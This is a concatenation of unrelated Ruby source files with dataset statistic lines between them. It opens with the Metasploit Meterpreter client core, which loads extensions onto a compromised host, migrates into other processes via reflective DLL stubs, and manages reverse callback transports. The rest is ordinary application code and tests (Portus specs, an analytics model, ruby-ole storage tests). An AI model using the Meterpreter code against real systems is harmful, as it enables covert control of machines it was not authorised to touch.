# (can be used instead of LibraryFilePath)
#
# TargetFilePath
# The target library path when uploading
#
# UploadLibrary
# Indicates whether or not the library should be uploaded
#
# SaveToDisk
# Indicates whether or not the library should be saved to disk
# on the remote machine
#
# Extension
# Indicates whether or not the library is a meterpreter extension
#
def load_library(opts)
library_path = opts['LibraryFilePath']
library_image = opts['LibraryFileImage']
target_path = opts['TargetFilePath']
load_flags = LOAD_LIBRARY_FLAG_LOCAL
# No library path, no cookie.
if library_path.nil? && library_image.nil?
raise ArgumentError, 'No library file path or image was supplied', caller
end
# Set up the proper loading flags
if opts['UploadLibrary']
load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
end
if opts['SaveToDisk']
load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
end
if opts['Extension']
load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
end
# Create a request packet
request = Packet.create_request(COMMAND_ID_CORE_LOADLIB)
# If we must upload the library, do so now
if (load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL
if library_image.nil?
# Caller did not provide the image, load it from the path
library_image = ''
::File.open(library_path, 'rb') { |f|
library_image = f.read
}
end
if library_image
request.add_tlv(TLV_TYPE_DATA, library_image, false, client.capabilities[:zlib])
else
raise RuntimeError, "Failed to serialize library #{library_path}.", caller
end
# If it's an extension we're dealing with, rename the library
# path of the local and target so that it gets loaded with a random
# name
if opts['Extension']
if client.binary_suffix and client.binary_suffix.size > 1
/(.*)\.(.*)/.match(library_path)
suffix = $2
elsif client.binary_suffix.size == 1
suffix = client.binary_suffix[0]
else
suffix = client.binary_suffix
end
library_path = "ext#{rand(1000000)}.#{suffix}"
target_path = "/tmp/#{library_path}"
end
end
# Add the base TLVs
request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
request.add_tlv(TLV_TYPE_FLAGS, load_flags)
if !target_path.nil?
request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
end
# Transmit the request and wait the default timeout seconds for a response
response = self.client.send_packet_wait_response(request, self.client.response_timeout)
# No response?
if response.nil?
raise RuntimeError, 'No response was received to the core_loadlib request.', caller
elsif response.result != 0
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
end
commands = []
response.each(TLV_TYPE_UINT) { |c|
commands << c.value
}
commands
end
#
# Loads a meterpreter extension on the remote server instance and
# initializes the client-side extension handlers
#
# Module
# The module that should be loaded
#
# LoadFromDisk
# Indicates that the library should be loaded from disk, not from
# memory on the remote machine
#
def use(mod, opts = { })
if mod.nil?
raise RuntimeError, "No modules were specified", caller
end
modnameprovided = mod
suffix = nil
if not client.binary_suffix
suffix = ''
elsif client.binary_suffix.size > 1
client.binary_suffix.each { |s|
if (mod =~ /(.*)\.#{s}/ )
mod = $1
suffix = s
break
end
}
else
suffix = client.binary_suffix.first
end
# Query the remote instance to see if commands for the extension are
# already loaded
commands = get_loaded_extension_commands(mod.downcase)
# if there are existing commands for the given extension, then we can use
# what's already there
unless commands.length > 0
image = nil
path = nil
# If client.sys isn't setup, it's a Windows meterpreter
if client.respond_to?(:sys) && !client.sys.config.sysinfo['BuildTuple'].blank?
# Query the payload gem directly for the extension image
image = MetasploitPayloads::Mettle.load_extension(client.sys.config.sysinfo['BuildTuple'], mod.downcase, suffix)
else
# Get us to the installation root and then into data/meterpreter, where
# the file is expected to be
modname = "ext_server_#{mod.downcase}"
path = MetasploitPayloads.meterpreter_path(modname, suffix)
if opts['ExtensionPath']
path = ::File.expand_path(opts['ExtensionPath'])
end
end
if path.nil? and image.nil?
if Rex::Post::Meterpreter::ExtensionMapper.get_extension_names.include?(mod.downcase)
raise RuntimeError, "The \"#{mod.downcase}\" extension is not supported by this Meterpreter type (#{client.session_type})", caller
else
raise RuntimeError, "No module of the name #{modnameprovided} found", caller
end
end
# Load the extension DLL
commands = load_library(
'LibraryFilePath' => path,
'LibraryFileImage' => image,
'UploadLibrary' => true,
'Extension' => true,
'SaveToDisk' => opts['LoadFromDisk'])
end
# wire the commands into the client
client.add_extension(mod, commands)
return true
end
#
# Set the UUID on the target session.
#
def set_uuid(uuid)
request = Packet.create_request(COMMAND_ID_CORE_SET_UUID)
request.add_tlv(TLV_TYPE_UUID, uuid.to_raw)
client.send_request(request)
true
end
#
# Set the session GUID on the target session.
#
def set_session_guid(guid)
request = Packet.create_request(COMMAND_ID_CORE_SET_SESSION_GUID)
request.add_tlv(TLV_TYPE_SESSION_GUID, guid)
client.send_request(request)
true
end
#
# Get the session GUID from the target session.
#
def get_session_guid(timeout=nil)
request = Packet.create_request(COMMAND_ID_CORE_GET_SESSION_GUID)
args = [request]
args << timeout if timeout
response = client.send_request(*args)
response.get_tlv_value(TLV_TYPE_SESSION_GUID)
end
#
# Get the machine ID from the target session.
#
def machine_id(timeout=nil)
request = Packet.create_request(COMMAND_ID_CORE_MACHINE_ID)
args = [request]
args << timeout if timeout
response = client.send_request(*args)
mid = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
# Normalise the format of the incoming machine id so that it's consistent
# regardless of case and leading/trailing spaces. This means that the
# individual meterpreters don't have to care.
# Note that the machine ID may be blank or nil and that is OK
Rex::Text.md5(mid.to_s.downcase.strip)
end
#
# Get the current native arch from the target session.
#
def native_arch(timeout=nil)
# Not all meterpreter implementations support this
request = Packet.create_request(COMMAND_ID_CORE_NATIVE_ARCH)
args = [ request ]
args << timeout if timeout
response = client.send_request(*args)
response.get_tlv_value(TLV_TYPE_STRING)
end
#
# Remove a transport from the session based on the provided options.
#
def transport_remove(opts={})
request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_REMOVE, opts)
return false unless request
client.send_request(request)
return true
end
#
# Add a transport to the session based on the provided options.
#
def transport_add(opts={})
request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_ADD, opts)
return false unless request
client.send_request(request)
return true
end
#
# Change the currently active transport on the session.
#
def transport_change(opts={})
request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_CHANGE, opts)
return false unless request
client.send_request(request)
return true
end
#
# Sleep the current session for the given number of seconds.
#
def transport_sleep(seconds)
return false if seconds == 0
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SLEEP)
# we're reusing the comms timeout setting here instead of
# creating a whole new TLV value
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, seconds)
client.send_request(request)
return true
end
#
# Change the active transport to the next one in the transport list.
#
def transport_next
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_NEXT)
client.send_request(request)
return true
end
#
# Change the active transport to the previous one in the transport list.
#
def transport_prev
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_PREV)
client.send_request(request)
return true
end
  #
  # Enable SSL certificate hash verification for the current connection.
  #
def enable_ssl_hash_verify
# Not supported unless we have a socket with SSL enabled
return nil unless self.client.sock.type? == 'tcp-ssl'
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH)
hash = Rex::Text.sha1_raw(self.client.sock.sslctx.cert.to_der)
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
client.send_request(request)
return hash
end
#
# Disable SSL certificate hash verification (pinning) on the transport.
#
# Returns true on success, or nil when the transport is not SSL-backed.
#
def disable_ssl_hash_verify
  # Not supported unless we have a socket with SSL enabled
  return nil unless self.client.sock.type? == 'tcp-ssl'
  request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH)
  # Sending the SETCERTHASH request with no hash TLV clears the pin.
  client.send_request(request)
  return true
end
#
# Attempt to get the SSL hash being used for verification (if any).
#
# @return 20-byte sha1 hash currently being used for verification, or
#   nil when the transport is not SSL-backed.
#
def get_ssl_hash_verify
  # Not supported unless we have a socket with SSL enabled
  return nil unless self.client.sock.type? == 'tcp-ssl'
  request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_GETCERTHASH)
  response = client.send_request(request)
  return response.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
end
#
# Migrates the meterpreter instance to the process specified
# by pid. The connection to the server remains established.
#
# NOTE(review): writable_dir is accepted but never used in this body —
# presumably kept for API compatibility with other platforms; confirm.
# Raises RuntimeError when the target process does not exist, cannot be
# opened (Windows), or is the current process. Returns true on success,
# false if post-migration SSL renegotiation times out.
#
def migrate(target_pid, writable_dir = nil, opts = {})
  # Suspend keep-alives for the duration of the migration; restored at the end.
  keepalive = client.send_keepalives
  client.send_keepalives = false
  target_process = nil
  current_process = nil
  # Load in the stdapi extension if not already present so we can determine the target pid architecture...
  client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')
  current_pid = client.sys.process.getpid
  # Find the current and target process instances
  client.sys.process.processes.each { | p |
    if p['pid'] == target_pid
      target_process = p
    elsif p['pid'] == current_pid
      current_process = p
    end
  }
  # We can't migrate into a process that does not exist.
  unless target_process
    raise RuntimeError, 'Cannot migrate into non existent process', caller
  end
  # We cannot migrate into a process that we are unable to open
  # On linux, arch is empty even if we can access the process
  if client.platform == 'windows'
    if target_process['arch'] == nil || target_process['arch'].empty?
      raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
    end
  end
  # And we also cannot migrate into our own current process...
  if current_process['pid'] == target_process['pid']
    raise RuntimeError, 'Cannot migrate into current process', caller
  end
  # Build the transport-specific loader stub and the full payload blob.
  migrate_stub = generate_migrate_stub(target_process)
  migrate_payload = generate_migrate_payload(target_process)
  # Build the migration request
  request = Packet.create_request(COMMAND_ID_CORE_MIGRATE)
  request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
  # Payload and stub are compressed when the remote side advertises zlib support.
  request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
  request.add_tlv(TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib])
  if target_process['arch'] == ARCH_X64
    request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
  else
    request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
  end
  # if we change architecture, we need to change UUID as well
  if current_process['arch'] != target_process['arch']
    client.payload_uuid.arch = target_process['arch']
    request.add_tlv( TLV_TYPE_UUID, client.payload_uuid.to_raw )
  end
  # Send the migration request. Timeout can be specified by the caller, or set to a min
  # of 60 seconds.
  timeout = [(opts[:timeout] || 0), 60].max
  client.send_request(request, timeout)
  # Post-migration the session doesn't have encryption any more.
  # Set the TLV key to nil to make sure that the old key isn't used
  # at all.
  client.tlv_enc_key = nil
  if client.passive_service
    # Sleep for 5 seconds to allow the full handoff, this prevents
    # the original process from stealing our loadlib requests
    ::IO.select(nil, nil, nil, 5.0)
  elsif client.pivot_session.nil?
    # Prevent new commands from being sent while we finish migrating
    client.comm_mutex.synchronize do
      # Disable the socket request monitor
      client.monitor_stop
      ###
      # Now communicating with the new process
      ###
      # only renegotiate SSL if the session had support for it in the
      # first place!
      if client.supports_ssl?
        # If renegotiation takes longer than a minute, it's a pretty
        # good bet that migration failed and the remote side is hung.
        # Since we have the comm_mutex here, we *must* release it to
        # keep from hanging the packet dispatcher thread, which results
        # in blocking the entire process.
        begin
          Timeout.timeout(timeout) do
            # Renegotiate SSL over this socket
            client.swap_sock_ssl_to_plain()
            client.swap_sock_plain_to_ssl()
          end
        rescue TimeoutError
          # NOTE(review): TimeoutError is a deprecated alias of
          # Timeout::Error on modern Ruby — confirm supported versions.
          client.alive = false
          return false
        end
      end
      # Restart the socket monitor
      client.monitor_socket
    end
  end
  # Renegotiate TLV encryption on the migrated session
  secure
  # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
  client.ext.aliases.keys.each { |e|
    client.core.use(e)
  }
  # Restore session keep-alives
  client.send_keepalives = keepalive
  return true
end
# Negotiate a fresh TLV-level encryption key with the server and install
# it on the client so subsequent traffic is encrypted.
def secure
  client.tlv_enc_key = negotiate_tlv_encryption
end
#
# Shuts the session down
#
def shutdown
  packet = Packet.create_request(COMMAND_ID_CORE_SHUTDOWN)
  unless client.passive_service
    # If this is a standard TCP session, send and forget.
    self.client.send_packet(packet)
    return true
  end
  # If this is a HTTP/HTTPS session we need to wait a few seconds
  # otherwise the session may not receive the command before we
  # kill the handler. This could be improved by the server side
  # sending a reply to shutdown first.
  self.client.send_packet_wait_response(packet, 10)
  true
end
#
# Indicates if the given transport is a valid transport option.
#
def valid_transport?(transport)
  !transport.nil? && VALID_TRANSPORTS.key?(transport.downcase)
end
#
# Negotiates the use of encryption at the TLV level
#
# Generates an ephemeral 2048-bit RSA keypair, sends the public key to
# the server, and expects a symmetric session key back (ideally encrypted
# to our RSA key). Returns a hash { key:, type: }; :key is nil when the
# negotiation fails, in which case traffic remains plaintext.
#
def negotiate_tlv_encryption
  sym_key = nil
  rsa_key = OpenSSL::PKey::RSA.new(2048)
  rsa_pub_key = rsa_key.public_key
  request = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
  request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_der)
  begin
    response = client.send_request(request)
    key_enc = response.get_tlv_value(TLV_TYPE_ENC_SYM_KEY)
    key_type = response.get_tlv_value(TLV_TYPE_SYM_KEY_TYPE)
    if key_enc
      # Preferred path: server encrypted the symmetric key to our RSA key.
      sym_key = rsa_key.private_decrypt(key_enc, OpenSSL::PKey::RSA::PKCS1_PADDING)
    else
      # Fallback: symmetric key was delivered unencrypted on the wire.
      sym_key = response.get_tlv_value(TLV_TYPE_SYM_KEY)
    end
  rescue OpenSSL::PKey::RSAError, Rex::Post::Meterpreter::RequestError
    # 1) OpenSSL error may be due to padding issues (or something else)
    # 2) Request error probably means the request isn't supported, so fallback to plain
  end
  # NOTE(review): key_type stays nil if the request raised before it was
  # assigned; callers appear to tolerate a nil :type — confirm.
  {
    key: sym_key,
    type: key_type
  }
end
private
#
# Get a reference to the currently active transport.
#
def get_current_transport
  transport_list[:transports].first
end
#
# Generate a migrate stub that is specific to the current transport type and the
# target process.
#
# Only Windows x86/x64 sessions are supported; anything else raises.
# The stub is built by composing payload mixins chosen from the target
# process architecture and the active transport's URL scheme.
#
def generate_migrate_stub(target_process)
  stub = nil
  if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
    t = get_current_transport
    c = Class.new(::Msf::Payload)
    if target_process['arch'] == ARCH_X86
      c.include(::Msf::Payload::Windows::BlockApi)
      # Choose the migration mixin matching the transport URL scheme.
      case t[:url]
      when /^tcp/i
        c.include(::Msf::Payload::Windows::MigrateTcp)
      when /^pipe/i
        c.include(::Msf::Payload::Windows::MigrateNamedPipe)
      when /^http/i
        # Covers HTTP and HTTPS
        c.include(::Msf::Payload::Windows::MigrateHttp)
      end
    else
      # x64 variants of the same mixin selection.
      c.include(::Msf::Payload::Windows::BlockApi_x64)
      case t[:url]
      when /^tcp/i
        c.include(::Msf::Payload::Windows::MigrateTcp_x64)
      when /^pipe/i
        c.include(::Msf::Payload::Windows::MigrateNamedPipe_x64)
      when /^http/i
        # Covers HTTP and HTTPS
        c.include(::Msf::Payload::Windows::MigrateHttp_x64)
      end
    end
    stub = c.new().generate
  else
    raise RuntimeError, "Unsupported session #{client.session_type}"
  end
  stub
end
#
# Helper function to prepare a transport request that will be sent to the
# attached session.
#
# Returns nil when the transport/lport options are invalid, false when a
# reverse transport is missing :lhost, otherwise the populated Packet.
#
def transport_prepare_request(method, opts={})
  unless valid_transport?(opts[:transport]) && opts[:lport]
    return nil
  end
  # Use core Ruby String#start_with? rather than the ActiveSupport-only
  # starts_with? alias, matching the rest of this method.
  if opts[:transport].start_with?('reverse')
    return false unless opts[:lhost]
  else
    # Bind shouldn't have lhost set
    opts[:lhost] = nil
  end
  transport = opts[:transport].downcase
  request = Packet.create_request(method)
  # Transport names look like "reverse_https"; the scheme is the suffix.
  scheme = transport.split('_')[1]
  url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
  # Optional local URI: normalise leading slash and strip a trailing one.
  if opts[:luri] && opts[:luri].length > 0
    if opts[:luri][0] != '/'
      url << '/'
    end
    url << opts[:luri]
    if url[-1] == '/'
      url = url[0...-1]
    end
  end
  if opts[:comm_timeout]
    request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
  end
  if opts[:session_exp]
    request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
  end
  if opts[:retry_total]
    request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
  end
  if opts[:retry_wait]
    request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
  end
  # do more magic work for http(s) payloads
  unless transport.end_with?('tcp')
    if opts[:uri]
      url << '/' unless opts[:uri].start_with?('/')
      url << opts[:uri]
      url << '/' unless opts[:uri].end_with?('/')
    else
      # No explicit URI: generate a checksummed UUID-based one.
      sum = uri_checksum_lookup(:connect)
      url << generate_uri_uuid(sum, opts[:uuid]) + '/'
    end
    # TODO: randomise if not specified?
    opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
    request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
    if transport == 'reverse_https' && opts[:cert] # currently only https transport offers ssl
      hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert])
      request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
    end
    if opts[:proxy_host] && opts[:proxy_port]
      prefix = 'http://'
      prefix = 'socks=' if opts[:proxy_type].to_s.downcase == 'socks'
      proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
      request.add_tlv(TLV_TYPE_TRANS_PROXY_HOST, proxy)
      if opts[:proxy_user]
        request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
      end
      if opts[:proxy_pass]
        request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
      end
    end
  end
  request.add_tlv(TLV_TYPE_TRANS_TYPE, VALID_TRANSPORTS[transport])
  request.add_tlv(TLV_TYPE_TRANS_URL, url)
  request
end
#
# Create a full Windows-specific migration payload specific to the target process.
#
# Composes a stager class from the reflective DLL loader mixin that
# matches the target architecture, then stages meterpreter through it.
#
def generate_migrate_windows_payload(target_process)
  stager_class = Class.new( ::Msf::Payload )
  stager_class.include( ::Msf::Payload::Stager )
  # Include the appropriate reflective dll injection module for the target process architecture...
  # Used to generate a reflective DLL when migrating. This is yet another
  # argument for moving the meterpreter client into the Msf namespace.
  case target_process['arch']
  when ARCH_X86
    stager_class.include( ::Msf::Payload::Windows::MeterpreterLoader )
  when ARCH_X64
    stager_class.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
  else
    raise RuntimeError, "Unsupported target architecture '#{target_process['arch']}' for process '#{target_process['name']}'.", caller
  end
  # Create the migrate stager
  stager_class.new.stage_meterpreter
end
#
# Create a full migration payload specific to the target process.
#
# Currently only Windows targets are supported; other platforms raise.
#
def generate_migrate_payload(target_process)
  unless client.platform == 'windows'
    raise RuntimeError, "Unsupported platform '#{client.platform}'"
  end
  generate_migrate_windows_payload(target_process)
end
end
end; end; end
| 29.848075 | 140 | 0.68404 |
e27e4fa758e5eade7f7cf4b6a0019b2ff75925ef | 973 | require "rails_helper"
# Authorization matrix for the admin teams index:
# admin -> paginated list, anonymous -> login redirect, normal user -> 401.
RSpec.describe Admin::TeamsController, type: :controller do
  let(:admin) { create(:admin) }
  let(:user) { create(:user) }

  context "as admin user" do
    before :each do
      # A registry record must exist for the admin pages to render.
      create(:registry)
      sign_in admin
    end

    describe "GET #index" do
      it "paginates teams" do
        get :index
        # will_paginate/kaminari collections respond to total_pages.
        expect(assigns(:teams)).to respond_to(:total_pages)
      end

      it "returns http success" do
        get :index
        expect(response).to have_http_status(:success)
      end
    end
  end

  context "not logged into portus" do
    describe "GET #index" do
      it "redirects to login page" do
        get :index
        expect(response).to redirect_to(new_user_session_path)
      end
    end
  end

  context "as normal user" do
    before :each do
      sign_in user
    end

    describe "GET #index" do
      it "blocks access" do
        get :index
        expect(response.status).to eq(401)
      end
    end
  end
end
| 19.46 | 62 | 0.610483 |
1ab8af48bd99f251aaaf0625b86f5d8c94ab94a3 | 440 | require_relative 'meta'
require_relative 'range'
require_relative 'hour_range'
# A rental plan composed of metadata (name) and a set of pricing ranges.
class RentalPlan
  attr_reader :ranges

  # Factory: build a plan named +name+ with the default range set.
  # Uses the return values of make_meta/make_ranges directly instead of
  # re-reading class-level instance variables, so concurrent or repeated
  # calls cannot observe each other's intermediate state. The class
  # ivars are still assigned inside the helpers for compatibility.
  def self.make name
    new make_meta(name), make_ranges
  end

  # Build (and memo on the class, for compatibility) the plan metadata.
  def self.make_meta name
    @meta = Meta.new name
  end

  # Build (and memo on the class, for compatibility) the default ranges.
  def self.make_ranges
    @ranges = [ PlanRange.make ]
  end

  def initialize meta, ranges
    @meta = meta
    @ranges = ranges
  end

  # The plan's display name, delegated to its metadata.
  def name
    @meta.name
  end
end
| 13.75 | 32 | 0.679545 |
ab8fd73ffc245b1b6a727eb1a7645da141a1074d | 404 | # frozen_string_literal: true
# Page-hit analytics rows (ip_address, referrer, user_agent, ...).
class Analytics < ApplicationRecord
  # Rows recorded for +ip+, newest first. +col+ restricts the selected
  # columns; when it comes from user input it must be sanitized with
  # parse_field first, since it is passed straight into SELECT.
  # (Dropped the pointless "#{col}" interpolation — col is passed as-is.)
  scope :hits_by_ip, ->(ip, col = "*") { select(col).where(ip_address: ip).order("id DESC") }

  # Count of non-NULL values in +col+ across all rows.
  def self.count_by_col(col)
    calculate(:count, col)
  end

  # Whitelist a column name arriving from user input. Anything outside
  # the known columns collapses to the harmless literal "1", keeping the
  # generated SQL injection-free.
  def self.parse_field(field)
    valid_fields = %w[ip_address referrer user_agent]
    if valid_fields.include?(field)
      field
    else
      "1"
    end
  end
end
| 21.263158 | 97 | 0.65099 |
625cf1fb985cff03036d634d08cfa56e352b8633 | 216 | module Payjp
class Customer < APIResource
include Payjp::APIOperations::Create
include Payjp::APIOperations::Delete
include Payjp::APIOperations::Update
include Payjp::APIOperations::List
end
end
| 24 | 40 | 0.75463 |
871cf1f0b92d543abaa5c16f8761f58c106337bf | 160 | require 'bundler'
# Load the gems for the current environment (RACK_ENV, then RAILS_ENV,
# defaulting to :development), then require and boot the application.
Bundler.require :default, ENV['RACK_ENV'] || ENV['RAILS_ENV'] || :development
require './lib/banner_syncinator'
BannerSyncinator.initialize!
| 26.666667 | 77 | 0.7625 |
219fd92bd73292fa662d8652a70b23908c5a0504 | 7,053 | #! /usr/bin/ruby
# coding: utf-8
$: << File.dirname(__FILE__) + '/../lib'
#require 'rubygems'
require 'test/unit'
require 'ole/storage'
require 'digest/sha1'
require 'stringio'
require 'tempfile'
#
# = TODO
#
# These tests could be a lot more complete.
#
# should test resizeable and migrateable IO.
# Read-path tests against the bundled Word 6 fixture document.
# Changes from review: assert_equal with a nil expectation is deprecated
# (and an error in modern minitest) -> assert_nil; Kernel#open -> File.open.
class TestStorageRead < Test::Unit::TestCase
  TEST_DIR = File.dirname __FILE__

  def setup
    @ole = Ole::Storage.open "#{TEST_DIR}/test_word_6.doc", 'rb'
  end

  def teardown
    @ole.close
  end

  def test_header
    # should have further header tests, testing the validation etc.
    assert_equal 17, @ole.header.to_a.length
    assert_equal 117, @ole.header.dirent_start
    assert_equal 1, @ole.header.num_bat
    assert_equal 1, @ole.header.num_sbat
    assert_equal 0, @ole.header.num_mbat
  end

  def test_new_without_explicit_mode
    # An IO opened read-only should yield a non-writeable storage.
    File.open "#{TEST_DIR}/test_word_6.doc", 'rb' do |f|
      assert_equal false, Ole::Storage.new(f).writeable
    end
  end

  # Swap in a stub Ole::Log that records warnings for the duration of the
  # block; $VERBOSE is silenced around const_set to suppress the
  # "already initialized constant" warnings from reassigning Log.
  def capture_warnings
    @warn = []
    outer_warn = @warn
    old_log = Ole::Log
    old_verbose = $VERBOSE
    begin
      $VERBOSE = nil
      Ole.const_set :Log, Object.new
      # restore for the yield
      $VERBOSE = old_verbose
      (class << Ole::Log; self; end).send :define_method, :warn do |message|
        outer_warn << message
      end
      yield
    ensure
      $VERBOSE = nil
      Ole.const_set :Log, old_log
      $VERBOSE = old_verbose
    end
  end

  def test_invalid
    # Garbage and truncated inputs must be rejected outright.
    assert_raises Ole::Storage::FormatError do
      Ole::Storage.open StringIO.new(0.chr * 1024)
    end
    assert_raises Ole::Storage::FormatError do
      Ole::Storage.open StringIO.new(Ole::Storage::Header::MAGIC + 0.chr * 1024)
    end
    # A structurally-odd header only warns, then fails later on.
    capture_warnings do
      head = Ole::Storage::Header.new
      head.threshold = 1024
      assert_raises NoMethodError do
        Ole::Storage.open StringIO.new(head.to_s + 0.chr * 1024)
      end
    end
    assert_equal ['may not be a valid OLE2 structured storage file'], @warn
  end

  def test_inspect
    assert_match(/#<Ole::Storage io=#<File:.*?test_word_6.doc> root=#<Dirent:"Root Entry">>/, @ole.inspect)
  end

  def test_fat
    # the fat block has all the numbers from 5..118 bar 117
    bbat_table = [112] + ((5..118).to_a - [112, 117])
    assert_equal bbat_table, @ole.bbat.reject { |i| i >= (1 << 32) - 3 }, 'bbat'
    sbat_table = (1..43).to_a - [2, 3]
    assert_equal sbat_table, @ole.sbat.reject { |i| i >= (1 << 32) - 3 }, 'sbat'
  end

  def test_directories
    assert_equal 5, @ole.dirents.length, 'have all directories'
    # a more complicated one would be good for this
    assert_equal 4, @ole.root.children.length, 'properly nested directories'
  end

  def test_utf16_conversion
    assert_equal 'Root Entry', @ole.root.name
    assert_equal 'WordDocument', @ole.root.children[2].name
  end

  def test_read
    # the regular String#hash was different on the mac, so asserting
    # against full strings. switch this to sha1 instead of this fugly blob
    sha1sums = %w[
      d3d1cde9eb43ed4b77d197af879f5ca8b8837577
      65b75cbdd1f94ade632baeeb0848dec2a342c844
      cfc230ec7515892cfdb85e4a173e0ce364094970
      ffd859d94647a11b693f06f092d1a2bccc59d50d
    ]
    # test the ole storage type
    type = 'Microsoft Word 6.0-Dokument'
    assert_equal type, (@ole.root/"\001CompObj").read[32..-1][/([^\x00]+)/m, 1]
    # i was actually not loading data correctly before, so carefully check everything here
    assert_equal sha1sums, @ole.root.children.map { |child| Digest::SHA1.hexdigest child.read }
  end

  def test_dirent
    dirent = @ole.root.children.first
    assert_equal "\001Ole", dirent.name
    assert_equal 20, dirent.size
    assert_equal '#<Dirent:"Root Entry">', @ole.root.inspect
    # exercise Dirent#[]. note that if you use a number, you get the Struct
    # fields.
    assert_equal dirent, @ole.root["\001Ole"]
    assert_equal dirent.name_utf16, dirent[0]
    # assert_nil instead of deprecated assert_equal(nil, ...)
    assert_nil @ole.root.time
    assert_equal @ole.root.children, @ole.root.to_enum(:each_child).to_a
    dirent.open('r') { |f| assert_equal 2, f.first_block }
    dirent.open('w') { |f| }
    dirent.open('a') { |f| }
  end

  def test_delete
    dirent = @ole.root.children.first
    assert_raises(ArgumentError) { @ole.root.delete nil }
    assert_equal [dirent], @ole.root.children & [dirent]
    assert_equal 20, dirent.size
    @ole.root.delete dirent
    assert_equal [], @ole.root.children & [dirent]
    assert_equal 0, dirent.size
  end
end
# Write-path tests: flushing, repacking, and creating documents from
# scratch. Assertions pin the exact SHA-1 of the serialized container,
# so any change to the writer's on-disk layout shows up here.
class TestStorageWrite < Test::Unit::TestCase
  TEST_DIR = File.dirname __FILE__

  # SHA-1 hex digest helper used to fingerprint serialized output.
  def sha1 str
    Digest::SHA1.hexdigest str
  end

  # try and test all the various things the #flush function does
  # (placeholder — intentionally empty for now)
  def test_flush
  end

  # FIXME
  # don't really want to lock down the actual internal api's yet. this will just
  # ensure for the time being that #flush continues to work properly. need a host
  # of checks involving writes that resize their file bigger/smaller, that resize
  # the bats to more blocks, that resizes the sb_blocks, that has migration etc.

  def test_write_hash
    io = StringIO.open open("#{TEST_DIR}/test_word_6.doc", 'rb', &:read)
    assert_equal '9974e354def8471225f548f82b8d81c701221af7', sha1(io.string)
    # Opening and closing without edits still rewrites the container.
    Ole::Storage.open(io, :update_timestamps => false) { }
    # hash changed. used to be efa8cfaf833b30b1d1d9381771ddaafdfc95305c
    # thats because i now truncate the io, and am probably removing some trailing
    # allocated available blocks.
    assert_equal 'a39e3c4041b8a893c753d50793af8d21ca8f0a86', sha1(io.string)
    # add a repack test here
    Ole::Storage.open io, :update_timestamps => false, &:repack
    assert_equal 'c8bb9ccacf0aaad33677e1b2a661ee6e66a48b5a', sha1(io.string)
  end

  def test_plain_repack
    io = StringIO.open open("#{TEST_DIR}/test_word_6.doc", 'rb', &:read)
    assert_equal '9974e354def8471225f548f82b8d81c701221af7', sha1(io.string)
    Ole::Storage.open io, :update_timestamps => false, &:repack
    # note equivalence to the above flush, repack, flush
    assert_equal 'c8bb9ccacf0aaad33677e1b2a661ee6e66a48b5a', sha1(io.string)
    # lets do it again using memory backing
    Ole::Storage.open(io, :update_timestamps => false) { |ole| ole.repack :mem }
    # note equivalence to the above flush, repack, flush
    assert_equal 'c8bb9ccacf0aaad33677e1b2a661ee6e66a48b5a', sha1(io.string)
    # An unknown repack backing must be rejected.
    assert_raises ArgumentError do
      Ole::Storage.open(io, :update_timestamps => false) { |ole| ole.repack :typo }
    end
  end

  def test_create_from_scratch_hash
    io = StringIO.new('')
    Ole::Storage.open(io) { }
    assert_equal '6bb9d6c1cdf1656375e30991948d70c5fff63d57', sha1(io.string)
    # more repack test, note invariance
    Ole::Storage.open io, :update_timestamps => false, &:repack
    assert_equal '6bb9d6c1cdf1656375e30991948d70c5fff63d57', sha1(io.string)
  end

  def test_create_dirent
    Ole::Storage.open StringIO.new do |ole|
      dirent = Ole::Storage::Dirent.new ole, :name => 'test name', :type => :dir
      assert_equal 'test name', dirent.name
